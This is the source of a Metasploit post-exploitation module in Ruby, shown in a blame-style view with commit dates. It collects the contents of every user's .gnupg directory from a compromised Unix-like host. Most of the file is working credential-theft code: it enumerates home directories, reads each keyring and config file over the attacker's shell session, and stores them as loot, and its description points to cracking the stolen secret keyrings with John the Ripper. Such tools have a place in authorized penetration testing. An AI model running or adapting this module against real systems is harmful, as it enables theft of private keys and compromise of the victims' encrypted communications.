2012-10-02 12:16:57 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/common'
|
2012-10-15 11:58:35 +00:00
|
|
|
require 'msf/core/post/file'
|
|
|
|
require 'msf/core/post/unix'
|
2012-10-02 12:16:57 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Common
|
|
|
|
include Msf::Post::Unix
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info(info,
|
|
|
|
'Name' => 'Multi Gather GnuPG Credentials Collection',
|
|
|
|
'Description' => %q{
|
2012-10-04 15:59:00 +00:00
|
|
|
This module will collect the contents of user's .gnupg directory on the targeted
|
|
|
|
machine. Password protected secret keyrings can be cracked with JtR.
|
2012-10-02 12:16:57 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2012-10-04 15:59:00 +00:00
|
|
|
'Author' => ['Dhiru Kholia <dhiru[at]openwall.com>'],
|
2012-10-02 12:16:57 +00:00
|
|
|
'Platform' => ['linux', 'bsd', 'unix', 'osx'],
|
2012-10-04 15:59:00 +00:00
|
|
|
'SessionTypes' => ['shell']
|
2012-10-02 12:16:57 +00:00
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
# This module is largely based on ssh_creds and firefox_creds.rb.
|
|
|
|
|
|
|
|
def run
|
|
|
|
print_status("Finding .gnupg directories")
|
|
|
|
paths = enum_user_directories.map {|d| d + "/.gnupg"}
|
|
|
|
# Array#select! is only in 1.9
|
|
|
|
paths = paths.select { |d| directory?(d) }
|
|
|
|
|
|
|
|
if paths.nil? or paths.empty?
|
|
|
|
print_error("No users found with a .gnupg directory")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
download_loot(paths)
|
|
|
|
end
|
|
|
|
|
|
|
|
def download_loot(paths)
|
|
|
|
print_status("Looting #{paths.count} directories")
|
|
|
|
paths.each do |path|
|
|
|
|
path.chomp!
|
2012-10-04 15:59:00 +00:00
|
|
|
sep = "/"
|
|
|
|
files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
|
2012-10-02 12:16:57 +00:00
|
|
|
|
|
|
|
files.each do |file|
|
2012-10-04 15:59:00 +00:00
|
|
|
target = "#{path}#{sep}#{file}"
|
|
|
|
if directory?(target)
|
|
|
|
next
|
|
|
|
end
|
|
|
|
print_status("Downloading #{path}#{sep}#{file} -> #{file}")
|
|
|
|
data = read_file(target)
|
2012-10-02 12:16:57 +00:00
|
|
|
file = file.split(sep).last
|
2012-10-04 15:59:00 +00:00
|
|
|
type = file.gsub(/\.gpg.*/, "").gsub(/gpg\./, "")
|
|
|
|
loot_path = store_loot("gpg.#{type}", "text/plain", session, data,
|
2012-10-02 12:16:57 +00:00
|
|
|
"gpg_#{file}", "GnuPG #{file} File")
|
2012-10-04 15:59:00 +00:00
|
|
|
print_good("File stored in: #{loot_path.to_s}")
|
2012-10-02 12:16:57 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|